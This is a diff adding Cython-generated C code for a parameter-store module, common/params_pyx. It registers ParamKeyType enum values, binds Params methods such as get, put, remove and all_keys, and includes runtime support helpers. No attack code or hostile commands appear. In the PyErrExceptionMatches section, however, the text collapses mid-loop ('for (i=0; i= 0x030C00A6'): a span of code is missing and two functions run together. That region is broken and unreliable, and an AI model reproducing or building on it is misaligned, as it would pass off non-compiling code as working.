__Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION), 'CLEAR_ON_OFFROAD_TRANSITION') + * __Pyx_globals['ALL'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(ALL), 'ALL') + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 106, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 106, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = PyTuple_New(2); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 106, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_t_6); + __Pyx_INCREF(__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + __Pyx_GIVEREF(__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + __pyx_t_6 = 0; + __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_8, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 106, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 106, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION, __pyx_t_6) < 0))) __PYX_ERR(1, 106, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumType":107 + * __Pyx_globals['CLEAR_ON_MANAGER_START'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_MANAGER_START), 'CLEAR_ON_MANAGER_START') + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION), 'CLEAR_ON_ONROAD_TRANSITION') + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION), 'CLEAR_ON_OFFROAD_TRANSITION') # <<<<<<<<<<<<<< + * __Pyx_globals['ALL'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(ALL), 'ALL') + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = __Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_8); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_8); + __Pyx_INCREF(__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + __Pyx_GIVEREF(__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + __pyx_t_8 = 0; + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_t_5, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 107, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION, __pyx_t_8) < 0))) __PYX_ERR(1, 107, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "EnumType":108 + * __Pyx_globals['CLEAR_ON_ONROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_ONROAD_TRANSITION), 'CLEAR_ON_ONROAD_TRANSITION') + * __Pyx_globals['CLEAR_ON_OFFROAD_TRANSITION'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(CLEAR_ON_OFFROAD_TRANSITION), 'CLEAR_ON_OFFROAD_TRANSITION') + * __Pyx_globals['ALL'] = ParamKeyType(__Pyx_PyInt_From_enum__ParamKeyType(ALL), 'ALL') # <<<<<<<<<<<<<< + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_8, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_5 = __Pyx_PyInt_From_enum__ParamKeyType(ALL); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_5); + __Pyx_INCREF(__pyx_n_s_ALL); + __Pyx_GIVEREF(__pyx_n_s_ALL); + PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_n_s_ALL); + __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_8, __pyx_t_6, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 108, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_ALL, __pyx_t_5) < 0))) __PYX_ERR(1, 108, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_L5:; + + /* "common/params_pyx.pyx":6 + * from libcpp.string cimport string + * from libcpp.vector cimport vector + * import threading # <<<<<<<<<<<<<< + * + * cdef extern from "common/params.h": + */ + __pyx_t_5 = __Pyx_ImportDottedModule(__pyx_n_s_threading, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_threading, __pyx_t_5) < 0) __PYX_ERR(0, 6, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "common/params_pyx.pyx":29 + * + * + * def ensure_bytes(v): # <<<<<<<<<<<<<< + * return v.encode() if isinstance(v, str) else v; + * + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_1ensure_bytes, 0, __pyx_n_s_ensure_bytes, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__23)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_ensure_bytes, __pyx_t_5) < 0) __PYX_ERR(0, 29, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "common/params_pyx.pyx":32 + * return v.encode() if isinstance(v, str) else v; + * + * class UnknownKeyName(Exception): # <<<<<<<<<<<<<< + * pass + * + */ + __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])); + __Pyx_GIVEREF((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])); + PyTuple_SET_ITEM(__pyx_t_5, 0, ((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + __pyx_t_6 = __Pyx_PEP560_update_bases(__pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = __Pyx_CalculateMetaclass(NULL, __pyx_t_6); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_7 = __Pyx_Py3MetaclassPrepare(__pyx_t_8, __pyx_t_6, __pyx_n_s_UnknownKeyName, __pyx_n_s_UnknownKeyName, (PyObject *) NULL, __pyx_n_s_common_params_pyx, (PyObject *) NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (__pyx_t_6 != __pyx_t_5) { + if (unlikely((PyDict_SetItemString(__pyx_t_7, "__orig_bases__", __pyx_t_5) < 0))) __PYX_ERR(0, 32, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_Py3ClassCreate(__pyx_t_8, __pyx_n_s_UnknownKeyName, __pyx_t_6, __pyx_t_7, NULL, 0, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_UnknownKeyName, __pyx_t_5) < 0) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "common/params_pyx.pyx":46 + * del self.p + * + * def clear_all(self, tx_type=ParamKeyType.ALL): # <<<<<<<<<<<<<< + * self.p.clearAll(tx_type) + * + */ + __pyx_t_6 = __Pyx_Enum_ParamKeyType_to_py(ALL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_k__4 = __pyx_t_6; + __Pyx_GIVEREF(__pyx_t_6); + __pyx_t_6 = 0; + __pyx_t_6 = __Pyx_Enum_ParamKeyType_to_py(ALL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = PyTuple_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_t_6); + __pyx_t_6 = 0; + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_5clear_all, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_clear_all, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__25)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_t_8); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_clear_all, __pyx_t_6) < 0) __PYX_ERR(0, 46, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":49 + * self.p.clearAll(tx_type) + * + * def check_key(self, key): # <<<<<<<<<<<<<< + * key = ensure_bytes(key) + * if not self.p.checkKey(key): + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_7check_key, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_check_key, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_check_key, __pyx_t_6) < 0) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":55 + * return key + * + * def get(self, key, bool block=False, encoding=None): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef string val + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_9get, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_get, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__29)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 55, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_tuple__30); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_get, __pyx_t_6) < 0) __PYX_ERR(0, 55, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":71 + * return val if encoding is None else val.decode(encoding) + * + * def get_bool(self, key, bool block=False): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef bool r + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_11get_bool, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_get_bool, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__32)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 71, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_tuple__33); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_get_bool, __pyx_t_6) < 0) __PYX_ERR(0, 71, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":78 + * return r + * + * def put(self, key, dat): # <<<<<<<<<<<<<< + * """ + * Warning: This function blocks until the param is written to disk! + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_13put, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_put, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__35)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_put, __pyx_t_6) < 0) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":90 + * self.p.put(k, dat_bytes) + * + * def put_bool(self, key, bool val): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_15put_bool, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_put_bool, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__37)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_put_bool, __pyx_t_6) < 0) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":95 + * self.p.putBool(k, val) + * + * def remove(self, key): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_17remove, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_remove, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__39)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_remove, __pyx_t_6) < 0) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":100 + * self.p.remove(k) + * + * def get_param_path(self, key=""): # <<<<<<<<<<<<<< + * cdef string key_bytes = ensure_bytes(key) + * return self.p.getParamPath(key_bytes).decode("utf-8") + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_19get_param_path, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_get_param_path, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__41)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_tuple__42); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_get_param_path, __pyx_t_6) < 0) __PYX_ERR(0, 100, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "common/params_pyx.pyx":104 + * return self.p.getParamPath(key_bytes).decode("utf-8") + * + * def all_keys(self): # <<<<<<<<<<<<<< + * return self.p.allKeys() + * + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_21all_keys, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params_all_keys, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__43)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_10params_pyx_Params->tp_dict, __pyx_n_s_all_keys, __pyx_t_6) < 0) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + PyType_Modified(__pyx_ptype_6common_10params_pyx_Params); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_23__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params___reduce_cython, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__44)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_6) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_6Params_25__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Params___setstate_cython, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__45)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_6) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "common/params_pyx.pyx":107 + * return self.p.allKeys() + * + * def put_nonblocking(key, val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_3put_nonblocking, 0, __pyx_n_s_put_nonblocking, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__47)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_tuple__48); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_put_nonblocking, __pyx_t_6) < 0) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "common/params_pyx.pyx":110 + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + * def put_bool_nonblocking(key, bool val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_5put_bool_nonblocking, 0, __pyx_n_s_put_bool_nonblocking, NULL, __pyx_n_s_common_params_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__49)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_6, __pyx_tuple__50); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_put_bool_nonblocking, __pyx_t_6) < 0) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "common/params_pyx.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: language_level = 3 + * from libcpp cimport bool + */ + __pyx_t_6 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_6) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init common.params_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init common.params_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void 